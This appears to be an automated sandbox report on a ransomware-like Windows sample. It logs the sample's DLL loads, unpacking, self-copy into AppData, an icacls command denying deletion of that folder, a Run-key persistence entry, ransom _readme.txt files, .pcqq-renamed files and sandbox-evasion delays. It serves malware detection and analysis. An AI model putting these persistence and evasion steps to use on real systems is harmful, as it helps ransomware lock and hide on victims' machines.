        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: drprov.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: ntlanman.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: davclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: davhlpr.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: browcli.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: drprov.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: ntlanman.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: davclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: davhlpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: browcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
        Source: tsnsd8pOvn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: tsnsd8pOvn.exe, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: 785491~1.PCQntkrnlmp.pdb5 source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\laru_subokalimagomaduvoja mawezozuyoyohuhupuk-zenakejus.pdb source: tsnsd8pOvn.exe, tmpF2E2.tmp.7.dr, tsnsd8pOvn.exe.2.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\mpS source: tsnsd8pOvn.exe, 00000007.00000003.3348757761.0000000003179000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003178000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: &5(C:\laru_subokalimagomaduvoja mawezozuyoyohuhupuk-zenakejus.pdb.pdbX source: tsnsd8pOvn.exe, tmpF2E2.tmp.7.dr, tsnsd8pOvn.exe.2.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\e\E source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: tsnsd8pOvn.exe, 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\2 source: tsnsd8pOvn.exe, 00000007.00000003.3347231152.0000000003120000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\\*] source: tsnsd8pOvn.exe, 00000007.00000003.3347231152.0000000003120000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\\Micros source: tsnsd8pOvn.exe, 00000007.00000003.3348757761.0000000003179000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003178000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: d:\dbs\sh\odct\1105_210049_0\client\onedrive\Setup\Standalone\exe\obj\i386\OneDriveSetup.pdb source: wct425E.tmp.7.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ggZ source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeUnpacked PE file: 2.2.tsnsd8pOvn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeUnpacked PE file: 7.2.tsnsd8pOvn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 8.2.tsnsd8pOvn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 11.2.tsnsd8pOvn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 13.2.tsnsd8pOvn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeUnpacked PE file: 2.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeUnpacked PE file: 7.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 8.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 11.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 13.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00412100 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_00412100
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0217B0AF push ecx; retf 0_2_0217B0B2
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02238F05 push ecx; ret 0_2_02238F18
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00428565 push ecx; ret 2_2_00428578
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_021670AF push ecx; retf 5_2_021670B2
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02228F05 push ecx; ret 5_2_02228F18
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_0208B0AF push ecx; retf 6_2_0208B0B2
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022D8F05 push ecx; ret 6_2_022D8F18

        Persistence and Installation Behavior

        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exe
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF2E2.tmp
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\wct425E.tmp
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exe
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\chrome.exe.pcqq (copy)
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\tmpF2E2.tmp.pcqq (copy)
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\wct425E.tmp.pcqq (copy)
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\_readme.txt
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\$WinREAgent\_readme.txt
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\$WinREAgent\Scratch\_readme.txt
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\_readme.txt
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00481920
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0217971C rdtsc 0_2_0217971C
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0040E670
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct425E.tmp
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpF2E2.tmp
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exe
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\chrome.exe.pcqq (copy)
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmpF2E2.tmp.pcqq (copy)
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct425E.tmp.pcqq (copy)
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-45119
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe TID: 2448Thread sleep time: -139000s >= -30000s
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe TID: 6524Thread sleep count: 182 > 30
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeThread delayed: delay time: 139000
        Source: user-PC-20231005-0829.log.7.drBinary or memory string: 10/05/2023 08:29:28.687OFFICECL (0x12cc)0x498Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 551, "Time": "2023-10-05T06:29:18Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "pNpni+sgFme2AbL0FaUYvRnb6Aw=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCW
